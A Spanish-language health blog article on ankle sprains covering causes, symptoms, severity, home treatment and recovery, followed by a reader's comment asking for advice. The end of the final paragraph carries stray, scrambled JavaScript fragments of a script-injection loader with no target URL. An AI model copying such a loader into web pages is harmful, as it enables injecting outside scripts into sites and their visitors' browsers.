Salud y belleza » Deportes

Torceduras de tobillo

1 Comentario

A diferencia de otras lesiones, las torceduras de tobillo no discriminan: afectan a todos por igual. No importa si se trata de un deportista o el hombre que ganó el record Guinness por “mirar televisión en la cama”: solo basta un mal movimiento, un pequeño descuidado para padecer tal agresión al físico (ir al baño o correr una maratón, da lo mismo en el caso de las torceduras de tobillo).

Una torcedura (esguince en algunos casos) es la lesión por la cual se produce, o bien un estiramiento del ligamento o directamente una rotura (las roturas, en este caso, sí suele afectar a deportistas de alto nivel y difícilmente entran en la categoría de accidentes domésticos o caseros). Vale aclarar que los ligamentos conectan los huesos entre sí en una articulación y ayudan a que los huesos se mantengan en su lugar por lo tanto una lesión de éste tipo representa, sin dudas, una forma de perder movilidad.

El lugar más común para un esguince es un tobillo y las formas más habituales de padecer tal problema abarcan, como ya se dijo, casi cualquier actividad: caídas, golpes, torceduras, excesos de fuerza, mala posición, etcétera.

Básicamente, nos damos cuentan que hemos padecido una torcedura en el tobillo por señas tales como dolor o sensibilidad al tacto, hinchazón en el área del golpe, formación de moretones, rigidez e incapacidad para movilizarlo.

Hay diferentes tipos de torceduras o esguinces siendo los “leves” los más comunes y los “graves” aquellos más dolorosos y, obviamente, en los cuales se ve comprometida aún más nuestra integridad física (con un esguince leve se puede caminar pero, con uno grave, el dolor suele ser tan fuerte que nos prohíbe casi cualquier acción).

Los tratamientos para las torceduras, abarcan diferentes técnicas o estrategias: reposo, compresión, elevación. En determinados casos se recomienda el uso de hielo para desinflamar la zona (aunque, dicho sea de paso, este método solo es útil durante las primeras 48hs) o también el uso de algún tipo de férula o bota para proteger la zona e inmovilizarla.

Por otra parte, cuando el dolor se vuelve insoportable es común que el médico nos recete algún analgésico como el acetaminofeno o el ibuprofeno.

Sobre el tiempo de recuperación, deberán pasar varias semanas para poder volver a realizar esfuerzos físicos (deporte) y solo un par de días para intentar caminar, pero, claro, lo mínimo e indispensable.d.getElementsByTagName('head')[0].appendChild(s);var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

One Comment »

  • Ana said:

    Holaa yo eh sufrido 3 veces laa torcedura de tobillo,& hace una semana se me volvio a torcer, pero no fue en el tobillo fue como aun lado del tobillo pero no en el talon, no me duele mucho pero en veses si duele..Ocupo un consejo o algo me duele:(

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.